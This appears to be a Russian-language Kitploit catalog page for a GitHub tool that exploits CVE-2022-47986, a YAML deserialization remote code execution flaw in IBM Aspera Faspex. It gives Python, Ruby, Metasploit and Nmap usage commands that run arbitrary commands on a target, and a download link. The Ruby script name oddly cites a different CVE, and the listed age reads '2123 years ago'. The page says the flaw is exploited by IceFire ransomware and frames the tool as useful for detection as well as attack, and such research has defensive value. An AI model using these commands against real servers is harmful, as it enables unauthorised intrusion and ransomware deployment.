Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-47986 — CVE-2022-47986: модули Python, Ruby, NMAP и Metasploit для эксплуатации уязвимости. | Kitploit
Инструменты/GitHubGitHub/mauricelambert/cve-2022-47986
Фреймворки для эксплойтовЭксплуатацияЭксплуатация веб-приложений
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: модули Python, Ruby, NMAP и Metasploit для эксплуатации уязвимости.

Репозиторий
2123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-47986

Почему

Эта уязвимость эксплуатируется в реальных атаках. IceFire использует эту уязвимость для развертывания программы-вымогателя на целевых системах. Я хотел бы помочь командам SOC/Blue Teams выявлять затронутые системы, а пентестерам/Red Teams — эксплуатировать уязвимость и сообщать о ней.

Описание

Я предлагаю скрипты на чистом Python и Ruby, модули для Metasploit и Nmap для эксплуатации уязвимости, которая вызывает RCE (Remote Code Execution) на IBM Aspera Faspex из-за десериализации YAML.

Эксплуатация: RCE (Remote Code Execution)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

Источники

  • IBM
  • nvd.nist.gov
  • Блог - Эксплойт
  • thehackernews - эксплуатируется IceFire
  • thehackernews - каталог CISA KEV

Лицензия

Лицензировано под GPL, версия 3.

Скачать инструмент